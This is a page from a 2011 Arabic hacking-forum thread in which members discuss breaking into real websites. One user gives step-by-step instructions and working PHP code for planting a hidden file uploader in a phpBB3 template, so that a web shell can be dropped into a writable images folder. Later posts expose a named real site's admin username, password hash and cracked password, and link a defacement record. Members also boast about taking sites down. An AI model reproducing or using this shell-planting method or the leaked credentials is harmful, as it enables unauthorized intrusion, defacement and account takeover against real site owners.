:: vBspiders Professional Network :: - [تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)

صفحة 5 من 8

« الأولى

الأخيرة »

عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)

- - [تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :) (http://www.vbspiders.com/vb/t50558.html)

bleu moon

07-07-2011 01:32 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350147)

تم محو ال uploader ومحي اثاري لول

اوووك انتضر شوي رح انتقل زي الدوده في السيرفر ههه

SpookWeb

07-07-2011 01:36 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350148)

اوووك انتضر شوي رح انتقل زي الدوده في السيرفر ههه

loooooooooooooooooool good luck bro!!!! :D
موافق بـإذن الله ههههههه

bleu moon

07-07-2011 02:13 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350150)

loooooooooooooooooool good luck bro!!!! :D
موافق بـإذن الله ههههههه

كيف لغمتهم ؟؟ ههه ارجووك كيف ؟؟

SpookWeb

07-07-2011 02:30 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350171)

كيف لغمتهم ؟؟ ههه ارجووك كيف ؟؟

هههههههه أوكيه D: بس معلش, حقاك علي, راح اكتب بالإنجليزي لان اسهل علي... وأي توضيح, أنا جاهز.

------------------------------------
i searched online for hacking phpBB3 once i have the admin username and password. all i could find was that it's possible to include a php code inside the ACP

كود:

<!-- PHP -->

echo $cmd;

system($cmd);

<!-- ENDPHP -->

and that's considered a Shell

i liked it... but it was too much trouble doing all the php commands, so though, ok. i have access to change a page's php code... why not include an uploader and upload a shell? that's easier

i know how to code HTML so

كود:

ACP ->Styles -> Templates->Edit-> FAQ_body.html

i added this code in the body:

كود:

<table>

<form action="" enctype="multipart/form-data" method="post">

<tr>

<td colspan="2">H4v3 Fun Spiders Spooky AKA SpookWEB</td>

</tr>

<tr>

<td><input type="file" name="spiderF" /></td>

<td><input type="submit" name="submit" value="Spooky!" /></td>

</tr>

<tr>

</tr>        

</form>

</table>

and in the end of the HTML i added this:

كود:

<!-- PHP -->

if (isset($_POST['submit'])) {

$spookf = $_FILES['spiderF']['name'];

$spookt = $_FILES['spiderF']['tmp_name'];

if (@move_uploaded_file($spookt , "./images/".$spookf)) {

echo "Shell Uploaded. Check /images/YourShell.php";}else{echo "Upload Failed";}}

<!-- ENDPHP -->

i picked images folder cause i searched and found that phpBB set it to chmod
777
so i have full access to it
Now i went back to the ACP and in "Server Settings" i changed "Allow PHP Code" to Yes
than, on the ACP, be sure to "Purge Cache" to ******* the template so that the code may work....

DONE! :D

بستعمل MS Maren
للكتابة بالعربية لان ال كيبورد عندي مافي عربي هههههه...

إذا مامشي ال حال, مستعد اكتيبو بالعربي بس حياخد وقت شوية....

bleu moon

07-07-2011 02:50 PM

hhhhhhhhhhhhhhh thx :D

SpookWeb

07-07-2011 02:56 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350193)

hhhhhhhhhhhhhhh thx :D

ههههه العفو.
and thank you too :wink2:
ههههه D:

bleu moon

07-07-2011 03:04 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350195)

ههههه العفو.
and thank you too :wink2:
ههههه D:

سجلته في الزون ؟ الآندكس في هذا الموضوع هه

elhackerelkper

07-07-2011 04:17 PM

فى سيرفر جديد ولا علشان نفسى اشتغل شويه

bleu moon

07-07-2011 04:20 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة elhackerelkper (المشاركة 350215)

فى سيرفر جديد ولا علشان نفسى اشتغل شويه

رح انزل لكم سيرفر حلو للمبتديين زينا ههه

elhackerelkper

07-07-2011 04:25 PM

ياريت وانا هتابع معاك من انهارده

SpookWeb

07-07-2011 05:10 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350196)

سجلته في الزون ؟ الآندكس في هذا الموضوع هه

إنشغلت شوي معلش..

http://mirror.sec-t.net/defacements/?id=52097

SpyDZ

07-07-2011 10:58 PM

اخي راح نخترق جميع المواقع الموجود على السيرفر

bleu moon

07-08-2011 02:33 AM

حلو حلو حلو

bleu moon

07-08-2011 10:02 AM

اعطيني الكود كامل جاهز ... لانو كود البي اتش بي مابيشتغل :( بيضهر على الصفحه

SpookWeb

07-08-2011 10:09 AM

لازم تكتب كود ال php من دون

كود:

<?php code ?>

يعني الكود كامل شكلو:

كود:

<!-- PHP -->

if (isset($_POST['submit'])) {

$spookf = $_FILES['spiderF']['name'];

$spookt = $_FILES['spiderF']['tmp_name'];

if (@move_uploaded_file($spookt , "./images/".$spookf)) {

echo "ok";}else{echo "no";}}

<!-- ENDPHP -->

نستعمل

كود:

<!-- PHP -->

<!-- ENDPHP -->

حتى ال phpBB3 يعرف إنو كود php

bleu moon

07-08-2011 10:27 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350444)

لازم تكتب كود ال php من دون

كود:

<?php code ?>

يعني الكود كامل شكلو:

كود:

<!-- PHP -->

if (isset($_POST['submit'])) {

$spookf = $_FILES['spiderF']['name'];

$spookt = $_FILES['spiderF']['tmp_name'];

if (@move_uploaded_file($spookt , "./images/".$spookf)) {

echo "ok";}else{echo "no";}}

<!-- ENDPHP -->

نستعمل

كود:

<!-- PHP -->

<!-- ENDPHP -->

حتى ال phpBB3 يعرف إنو كود php

مالو شغال :(

بيسطعرضوا

SpookWeb

07-08-2011 10:31 AM

Did you go to ACP -> Security-> Allow PHP

and changed it to yes?

and where did you add the code?

bleu moon

07-08-2011 10:34 AM

ضفتوا في موضوع واستعرض مكان الرفع ولكن الدالة استعرضها المتصفح :(

SpookWeb

07-08-2011 10:43 AM

الكود ماينحط بـموضوع :S
ACP = Admin Control Panel

1- تدخل على لوحة تحكم المنتدى phpBB3 www.site.com/forum/administrator/ وبعدين
2- تغير إتاحة ال php:

كود:

Server Configuration: Security Settings - > Allow PHP in Templates: Yes

3- تدخل على Styles

كود:

Styles -> Templates -> Edit (Edit the default template, usually subsilver, but it works with others)

4- إختار من القائمة: faq_body.html
والسبب إنو هذي الصفحة قليل حد يفوت عليها
5- اضيف كود الphp + HTML
6- Save
7- إذهب إلى لوحة التحكم الرئيسية و: Purge Cache
Done

bleu moon

07-08-2011 10:48 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350455)

كود:

Server Configuration: Security Settings - > Allow PHP in Templates: Yes

3- تدخل على Styles

كود:

Styles -> Templates -> Edit (Edit the default template, usually subsilver, but it works with others)

اهه ! هذا الكود خاص بسكربت php bb... هههه لا انا مو هذا السكربت ..ح
دخلت الى لوحه التحكم .. وقمت باضافة خبر يحتوي على الكود ... هيك صار

مو هذا السكربت :aww:

SpookWeb

07-08-2011 10:55 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350459)

هههه ايوة بس phpbb :lol:

بس ممكن ينفع إذا عندك صلاحيات تغير كود الصفحة...

بس بدل

كود:

<!-- PHP -->

PHP_CODE_HERE

 <!-- ENDPHP -->

بـهذا:

كود:

<?php

PHP_CODE_HERE

?>

بس ماأظن يشتغل في موضوع إلا إذا عندك صلاحية تغير كود الصفحة.. :aww:

bleu moon

07-08-2011 11:39 AM

milac

07-08-2011 02:48 PM

أخواني هل من جديد في الاختراق

bleu moon

07-08-2011 05:52 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة milac (المشاركة 350552)

أخواني هل من جديد في الاختراق

ايوا
اسقطنا موقع ... ههه

bleu moon

07-08-2011 06:43 PM

تبا !
ممكن فك هذا الهاش ؟

$H$9m8WZZ7I47z2KbpfyVzk59QJ8hmfEx.

phpbb

SpookWeb

07-08-2011 06:58 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350641)

تبا !
ممكن فك هذا الهاش ؟

$H$9m8WZZ7I47z2KbpfyVzk59QJ8hmfEx.

phpbb

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWEB

http://en.gstarcad.com/
username:admin
hash: $H$9m8WZZ7I47z2KbpfyVzk59QJ8hmfEx.
pass: adminadmin

:rofl:

SpookWeb

07-08-2011 07:04 PM

والله العالم هول شي غريب مع باسورداتهم القوية ههههههه

bleu moon

07-08-2011 07:05 PM

هههه كيف حاول كمان ترفع سكربت الرفع على الموقع ... ههه بدي ارفع عليه مرة اخرى شل وجرب فيه ...
ههه
تجارب فقط ... ارجووك

SpookWeb

07-08-2011 07:09 PM

هههه حاضر. جاري المحاولة بس النت بطيء شوي

SpookWeb

07-08-2011 07:15 PM

مش قادر اسجل دخول... http://en.gstarcad.com/forum/login.p...urnUrl=/forum/
الظاهر الادمين عمل شي :(

SpookWeb

07-08-2011 07:17 PM

لا عليك, تم الدخول.
على مييييييين يا ادمين :rofl:

SpookWeb

07-08-2011 07:23 PM

أوكيه
دورك يا بطل

bleu moon

07-08-2011 09:46 PM

SpookWeb

07-09-2011 05:53 AM

ماشفت الاميل؟ :eeek:

bleu moon

07-09-2011 03:31 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350800)

ماشفت الاميل؟ :eeek:

nn :(

SpookWeb

07-09-2011 03:38 PM

أوكيه يا طيب
شوف الخاص :)

elhackerelkper

07-09-2011 03:55 PM

فى سيرفر جديد ولا لسه

bleu moon

07-09-2011 11:33 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة elhackerelkper (المشاركة 351006)

فى سيرفر جديد ولا لسه

يب

SpookWeb

07-09-2011 11:39 PM

يب؟؟؟ D:
:yipi:

elhackerelkper

07-09-2011 11:56 PM

طيب فين السيرفر :)

الساعة الآن 10:50 PM

صفحة 5 من 8

« الأولى

الأخيرة »

عرض 40 مشاركات من هذا الموضوع لكل صفحة

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0